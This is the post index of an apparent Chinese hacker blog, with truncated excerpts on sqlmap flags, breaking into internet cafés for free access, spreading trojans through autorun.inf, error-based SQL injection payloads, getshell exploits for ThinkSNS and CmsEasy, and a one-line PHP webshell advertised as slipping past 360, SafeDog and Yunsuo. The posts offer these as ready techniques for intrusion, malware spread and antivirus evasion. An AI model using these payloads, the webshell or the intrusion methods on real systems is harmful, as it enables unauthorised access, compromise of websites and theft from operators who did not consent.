黑翼博客 - 特立独行黑翼博客 - 特立独行

黑翼博客 - 特立独行
新鲜的“黑客思维”就是从全新的角度看待黑客技术,从更高的层面去思考;专注于黑客精神及技术交流分享的独立博客。

黑翼博客,技术交流,Dark博客,思维代码,特立独行

  • 中国黑客众生百态:我是黑客!
  • 1
sqlmap使用笔记 点滴记录

sqlmap使用笔记

-u #注入点-f #指纹判别数据库类型-b #获取数据库版本信息-p #指定可测试的参数(?page=1id=2 -p page,id)-D #指定数据库名-T #指定表名-C #指定字段-s #保存注入过程到一个文件,还可中断,下次恢......

01-08 91 views 0
入侵网吧实现免费上网( 技术文章

入侵网吧实现免费上网(

很多人喜欢去网吧玩黑,每个人都有不同的理由和目的。有的是实践所学,有的是为了争取自由,也有人是为了占小便宜。不管何种理由,都伴随着风险。不管是网管的监督还是旁人的......

01-07 106 views 0
用autorun.inf来传播木马 技术文章

用autorun.inf来传播木马

传统的autorun.inf都是直接open=木马.exe,但这样有一个缺点就是直接双击打不开,确实也是一个很头疼的问题。毕竟现在的用户都学聪明了,一旦有文件双击打不开就会意识到出现了问题......

01-07 101 views 0
SQL报错注入的12个函数及 技术文章

SQL报错注入的12个函数及

1、通过floor报错,注入语句如下: and select 1 from ( select count (*), concat ( version (), floor ( rand ( 0 )* 2 ))x from information_schema. tables group by x)a); 2、通过ExtractValue报错,注入语句如下: andextractvalue(1......

01-03 165 views 0
Thinksns前台Getshell 技术文章

Thinksns前台Getshell

这个漏洞只能在windows下使用,因为Linux下的后缀名很严格,所以不能用大写以及加空格来绕过。 先构造一个上传表单: htmlbody form action=http://localhost/thinksns434/index.php?app=publicmod=attachac......

01-03 205 views 0
CmsEasy前台无限制GetShell 技术文章

CmsEasy前台无限制GetShell

0x01 代码审计 lib/default/tool_act.php 392行 ? php function cut_image_action () { $len = 1 ; if ( config :: get ( base_url ) != / ){ $len = strlen ( config :: get ( base_url ))+ 1 ; } if ( substr ( $_POST [ pic ], 0 , 4 ) == http ){ fr......

01-03 92 views 0
最新过狗一句话木马 技术文章

最新过狗一句话木马

用的命令执行的方法 基本360 安全狗 云锁 之类的都可以过。 lt ;? php $args = tony ; $code = n;}$_POST[123];/* ; echo create_function ( $args , $code ); ? gt ;......

01-02 118 views 0